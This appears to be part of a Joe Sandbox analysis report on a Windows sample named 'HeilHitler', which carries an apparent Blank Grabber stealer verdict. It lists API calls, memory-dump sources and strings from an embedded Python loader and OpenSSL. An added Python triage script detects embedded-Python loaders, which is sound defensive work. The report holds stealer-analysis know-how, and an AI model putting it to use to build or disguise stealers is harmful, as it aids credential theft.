• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65889
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6589B
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658B4
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658C6
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658DF
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658F1
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6590D
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6591F
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6593B
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6594D
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65969
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6597B
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65997
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659A9
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659C5
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659D7
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction ID: b818f33a4d21ac703cfeb5d339d36cb22e7caedded4b05944280d23af7ad1323
• Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction Fuzzy Hash: FB22CF64A0DB0BD1FA549BD5B8125B433A1FF15781F942335D82EAA7A1FF3CB198B200
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
• Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction ID: d3a152d9022fc5cbed8f13374cf45911348c57e92719812608b5a812cbb71400
• Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction Fuzzy Hash: AB02E525E0DB0B90FA459BE5A8129B433A1BF05754F942335E43EAA3A5FF3CB559B300
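The two functions above (API ID AddressErrorLastProc, both in the main module at 00007FF633D60000) do the same thing against two different export tables: each calls GetProcAddress for a fixed list of symbol names, checks GetLastError after every call, and carries the format string "Failed to get address for %hs" for the failure path. One list is the CPython C-API (PyConfig_*, PyErr_*, Py_InitializeFromConfig, ...), the other is Tcl/Tk (Tcl_CreateInterp, Tk_Init, ...). That string table is a cheap triage signal for "executable that embeds and boots a Python runtime", which is consistent with the Blank Grabber verdict (a Python-based stealer). The report itself does not name the loader that produced these functions, so treating the pattern as a bundled-Python bootloader is an inference, not something the report states. The following triage script is an added example, not code from the report or from the sample: it extracts printable strings from a dump, looks for the marker and counts the resolved export names by family. The dump bytes, the family regexes and the 10-name threshold are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Format string visible in the report's "String ID" for both resolver functions.
MARKER = b"Failed to get address for %hs"

# Export-name families the two functions resolve. The regexes are this
# example's own heuristic, not something the report defines.
FAMILIES = {
    "python": re.compile(rb"^_?Py(?:_|[A-Z])\w*$"),   # PyConfig_Clear, Py_DecRef, ...
    "tcl":    re.compile(rb"^Tcl_\w+$"),
    "tk":     re.compile(rb"^Tk_\w+$"),
}

# Printable ASCII runs of 4+ bytes, roughly what strings(1) would report.
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")


@dataclass
class Triage:
    marker_found: bool
    names: dict = field(default_factory=dict)   # family -> sorted list of names

    @property
    def looks_like_embedded_python_loader(self) -> bool:
        # Threshold is an assumption of this example: a handful of Py* strings
        # can appear in unrelated binaries, a dozen plus the marker is telling.
        return self.marker_found and len(self.names.get("python", [])) >= 10


def extract_strings(blob: bytes):
    """Yield printable ASCII runs from a raw memory dump or PE image."""
    for m in PRINTABLE.finditer(blob):
        yield m.group(0)


def triage_dump(blob: bytes) -> Triage:
    """Classify a dump by the marker string and the export names it carries."""
    found = {fam: set() for fam in FAMILIES}
    for s in extract_strings(blob):
        for fam, rx in FAMILIES.items():
            if rx.match(s):
                found[fam].add(s.decode("ascii"))
    return Triage(
        marker_found=MARKER in blob,
        names={fam: sorted(v) for fam, v in found.items() if v},
    )


# Constructed sample: NUL-separated strings taken from the two String IDs
# above, plus one unrelated string. Not a real dump.
SAMPLE_DUMP = b"\x00".join([
    b"Failed to get address for %hs", b"GetProcAddress",
    b"PyConfig_Clear", b"PyConfig_InitIsolatedConfig", b"PyConfig_Read",
    b"PyErr_Clear", b"PyErr_Print", b"PyEval_EvalCode",
    b"PyImport_ImportModule", b"PyMarshal_ReadObjectFromString",
    b"PyRun_SimpleStringFlags", b"Py_DecRef", b"Py_InitializeFromConfig",
    b"Py_Finalize",
    b"Tcl_CreateInterp", b"Tcl_Init", b"Tk_Init", b"Tk_GetNumMainWindows",
    b"some unrelated string",
]) + b"\x00"


if __name__ == "__main__":
    # On a real case: triage_dump(open("....sdmp", "rb").read())
    result = triage_dump(SAMPLE_DUMP)
    print("marker:", result.marker_found)
    for fam, names in result.names.items():
        print(f"{fam}: {len(names)} names, e.g. {names[:3]}")
    print("embedded-Python loader?", result.looks_like_embedded_python_loader)
```

Run it against the .sdmp files the report links (the Source File entries) rather than the on-disk sample: the export names live in the mapped image, and a packed or encrypted on-disk copy may not expose them. Matching `Py*`/`Tcl_*` strings is a triage heuristic only; a legitimate Python-embedding application carries the same table, so the result narrows the hunt rather than proving malice.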
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F3F61
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F3F78
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F3F8F
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F3FC2
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F400B
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F403F
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F4091
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40A4
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40BB
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40CE
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40E5
                                                                                                                                                                                                                                            • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB0F4B53,?,?,?,?,?,?,?,?,00007FFDFB0F2B8B), ref: 00007FFDFB0F40F8
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
• Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: 00007B5630
• String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
• API String ID: 2248877218-1119032718
APIs
  • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF633D686B7,?,?,00000000,00007FF633D63CBB), ref: 00007FF633D6822C
  • Part of subcall function 00007FF633D62810: MessageBoxW.USER32 ref: 00007FF633D628EA
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
• Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
• String ID: $OpenSSL$OpenSSL: FATAL$no stack?
• API String ID: 1270133462-2963566556
                                                                                                                                                                                                                                            • Opcode ID: 4334f370b7a482bd35c4ecd3ae7f0d910e81077902a64c89114c2b2096981407
                                                                                                                                                                                                                                            • Instruction ID: 193dcda3f3cbe0bb609548b7916e0d86befa95c521a37b6c29a5e933ef2cfb4d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4334f370b7a482bd35c4ecd3ae7f0d910e81077902a64c89114c2b2096981407
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3291AE32B19B8385EB209F24D8609AD7760FF45B94F444336EA6D47AE9EF38E655C300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007B6570
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
                                                                                                                                                                                                                                            • API String ID: 4069847057-2661540032
                                                                                                                                                                                                                                            • Opcode ID: 4f80fd11e4851a1e8ac95db5fd60017dee8425b24d40a4da496b151f9a6555b3
                                                                                                                                                                                                                                            • Instruction ID: 009120b83a7da74720fd1634075c749d2e4c31671c7493386f4ab9bc839d28ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f80fd11e4851a1e8ac95db5fd60017dee8425b24d40a4da496b151f9a6555b3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35418232B08B5296F71CAB24D8A0B7833A0FB88B54F044575DA6E877D8DF6DE550CB00
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007E13331210
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\t1_enc.c$client finished$extended master secret$key expa$master s$n$nsio$server finished
                                                                                                                                                                                                                                            • API String ID: 1677897744-2209449699
                                                                                                                                                                                                                                            • Opcode ID: e36d4bbbe3f8c332e257ea66e05025d59355daf1d80406af26721cf5d49c00d7
                                                                                                                                                                                                                                            • Instruction ID: daeda7514ef97a0ed152a126a51ad2b698c4d7d95b23234dbaa4eb04bec8d26a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e36d4bbbe3f8c332e257ea66e05025d59355daf1d80406af26721cf5d49c00d7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A551E762B08B8281E724EF11E8507A9A7A0FB947C4F058175DE9E4779DDF3DD984C700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007$A1370$B5630
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                                                                                                                                                                                                            • API String ID: 751195488-1596076588
                                                                                                                                                                                                                                            • Opcode ID: a354be8fb617e6a659b2ebe151350e266f0d4f90f2c91f9f87cda44e37b83124
                                                                                                                                                                                                                                            • Instruction ID: 9a04a9b73c28df43561c3a7e723ef5953f3c1ce0a87c788d6df1ffda617dfc4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a354be8fb617e6a659b2ebe151350e266f0d4f90f2c91f9f87cda44e37b83124
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27517122F1AA4756EB049B15A830EB97391BF44B98F484235ED6E477EDEF3CE5458300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
